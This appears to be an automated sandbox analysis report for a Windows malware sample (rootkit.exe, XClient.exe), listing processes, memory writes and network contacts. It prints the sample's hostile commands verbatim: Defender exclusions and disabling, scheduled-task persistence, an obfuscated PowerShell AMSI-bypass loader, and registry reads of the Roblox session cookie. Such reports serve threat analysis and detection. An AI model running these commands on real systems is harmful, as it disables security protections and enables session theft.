Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4376 wrote to memory of 4056 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 4376 wrote to memory of 4056 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 4376 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 4376 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 4376 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4376 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4376 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 4376 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 4376 wrote to memory of 3580 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 4376 wrote to memory of 3580 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 4376 wrote to memory of 3580 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1980 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4056 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4056 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 1980 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4056 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4056 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 1980 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4056 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4056 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 1980 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 1980 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4056 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4056 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 1980 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 1912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 2656 wrote to memory of 672 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 2656 wrote to memory of 960 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 384 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 2656 wrote to memory of 720 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1044 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2656 wrote to memory of 1128 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2656 wrote to memory of 1152 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2656 wrote to memory of 1168 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1204 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1304 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1320 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1372 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1412 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1440 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1592 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1600 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2656 wrote to memory of 1656 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2656 wrote to memory of 1724 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oaSExpkudVCx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vKDQJdzZhUHcxb,[Parameter(Position=1)][Type]$wpdQgvzinM)$FNlWDXhLNEf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+'y'+'p'+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'P'+'u'+'b'+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+'ns'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$FNlWDXhLNEf.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+'l'+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+','+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$vKDQJdzZhUHcxb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+'e'+'d');$FNlWDXhLNEf.DefineMethod('I'+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l',$wpdQgvzinM,$vKDQJdzZhUHcxb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'ti'+[Char](109)+''+[Char](101)+''+','+''+'M'+'an'+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $FNlWDXhLNEf.CreateType();}$EeUsnCPsQHzJL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$WvdLDGOHBzEpPW=$EeUsnCPsQHzJL.GetMethod(''+'G'+''+'e'+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+'c'+'A'+''+[Char](100)+'dr'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xjLuGNtkNKzFGQQbgRE=oaSExpkudVCx @([String])([IntPtr]);$OShaGrHhfzBAuveWJhpeov=oaSExpkudVCx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KRYKBJIXbGa=$EeUsnCPsQHzJL.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+'H'+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'ern'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$sqtVbxEkGcentu=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$KRYKBJIXbGa,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+'y'+'A'+'')));$UzKPgwQTtnHpPBbHl=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$KRYKBJIXbGa,[Object]('V'+'i'+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+'t'+[Char](101)+''+'c'+'t')));$fWasPGS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sqtVbxEkGcentu,$xjLuGNtkNKzFGQQbgRE).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+'l'+'l');$JVdeMOyWmGqrvSAXn=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$fWasPGS,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+'n'+'B'+'u'+'ff'+'e'+''+[Char](114)+'')));$nmyhrEHocC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UzKPgwQTtnHpPBbHl,$OShaGrHhfzBAuveWJhpeov).Invoke($JVdeMOyWmGqrvSAXn,[uint32]8,4,[ref]$nmyhrEHocC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JVdeMOyWmGqrvSAXn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UzKPgwQTtnHpPBbHl,$OShaGrHhfzBAuveWJhpeov).Invoke($JVdeMOyWmGqrvSAXn,[uint32]8,0x20,[ref]$nmyhrEHocC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.DeadSecObbbfuscation.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{247bfd2f-a347-44c7-8793-1b197dc51c69}

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.3:443 gstatic.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/4376-0-0x00007FFA745E3000-0x00007FFA745E5000-memory.dmp

